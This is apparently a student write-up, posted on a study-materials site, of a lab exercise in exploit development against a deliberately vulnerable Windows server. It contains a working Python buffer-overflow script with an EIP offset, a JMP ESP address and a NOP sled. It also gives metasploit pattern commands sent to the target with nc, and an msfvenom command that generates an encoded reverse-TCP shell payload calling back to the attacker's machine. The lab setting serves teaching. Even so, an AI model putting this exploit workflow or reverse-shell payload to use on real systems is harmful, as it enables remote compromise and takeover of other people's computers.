ICT Ethical Hacking: Exploit Development Process

Verified

Added on 2023/06/04

AI Summary

This article discusses the exploit development process in ICT ethical hacking. It covers the phases of preparation, finding the overflow, weaponizing the vulnerability, and developing shellcode. The article provides step-by-step instructions and examples for each phase. The subject is ICT ethical hacking, and the course code and college/university are not mentioned.

Contribute Materials

Your contribution can guide someone’s learning journey. Share your documents today.

Running head: ICT ETHICAL HACKING
ICT ETHICAL HACKING
Name of the Student
Name of the university
Author Note

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.

Exploit development is a critical process which take advantages of a vulnerability or bugs
in order to cause unanticipated or unintended behavior in the software or hardware. Frequently, it
is used to gaining control of a computer system, allowing privilege escalation or a denial of
service attack. The whole development process has been categorized in certain phases. The
exploit development process is followed:
Preparation:
First, Kali virtual machine was opened and then enter into Win32 buffer victim virtual
machine. Before starting any process, it is need to ensure that both virtual machines are set to
NAT networking. Then the IP address on both machines are need to be checked.
1. Open Kali virtual machine
2. Open Win32 Buffer Victim virtual machine
3. Ensure both are set to NAT networking
4. Check the IP addresses on both
Finding the Overflow:
In the next phase, immunity debugger needs to open on the windows host. Then the
server.exe was loaded in immunity debugger. Then we entered the execution phase by pressing
F9 key. Then a new file had been created with the name “attack.py” in the kali. This files
contains python codes which are followed:
#!/usr/bin/python #Hashbang or shebang
import sys #System-specific parameters and
functions.
import os # using operating system dependent
functionality

import socket #connect nodes to a network
host = sys.argv[1] #open the file which is using first argument
port = int(sys.argv[2])
# Testing
buffer = "\x41"*500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
Then the command “python attack.py IP_ADDRESS 1337”. The IP address is the address of
the windows virtual machine. Then we swap to the Windows environment and press shift+F9 to pass
the exception to the executable.

We can see that EIP now contains our value, as does EBP. Whilst ESP points to a region of
memory which contains our injected value.
Weaponzing the vulnerability:
In this phase, server.exe was restarted by pressing CTRL + F2 within immunity debugger.
Then the execution process was initiated by pressing F9. The directory also needs to be change
into metasploit by running running cd /usr/share/metasploit-framework/tools/exploit. Run
./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337 within Kali, where IP_ADDRESS is the IP address of the
Windows VM. Then press SHIFT +F9 within Immunity debugger to pass the exception. Run
“./pattern_offset.rb -l 5000 -q 37694136” within Kali to determine the offset of EIP. Now we must
determine an address for code which will jump to ESP. The attack.py modified as follows:
1. #!/usr/bin/python
2. import sys
3. import os
4. import socket
5.

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.

6. host = sys.argv[1]
7. port = int(sys.argv[2])
8.
9. # EIP is overwritten at 260 bytes
10. buffer = "\x41"*260
11.
12. # Overwrite EIP with JMP ESP
13. buffer += "\x78\x16\xF3\x77"
14.
15. # NOPSLED
16. buffer += "\x90"*128
17.
18. # Shellcode
19. buffer +=
20.
21. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
22. con = s.connect((host, port))
23. s.send(buffer)
24. s.close()
Developing Shellcode:
1. Enter Kali.

2. Run the command msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e
x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python where <KALI_IP> is the IP
address of the Kali virtual machine.
3. Modify the attack.py file to include the generated shellcode.

1 out of 6

ICT Ethical Hacking: Exploit Development Process

Contribute Materials

Secure Best Marks with AI Grader

Secure Best Marks with AI Grader

Related Documents

Exploit Development: Phases and Process

ICT Ethical Hacking

Workshop - Exploit Development

Exploit Development in Ethical Hacking and Defence

+13062052269

info@desklib.com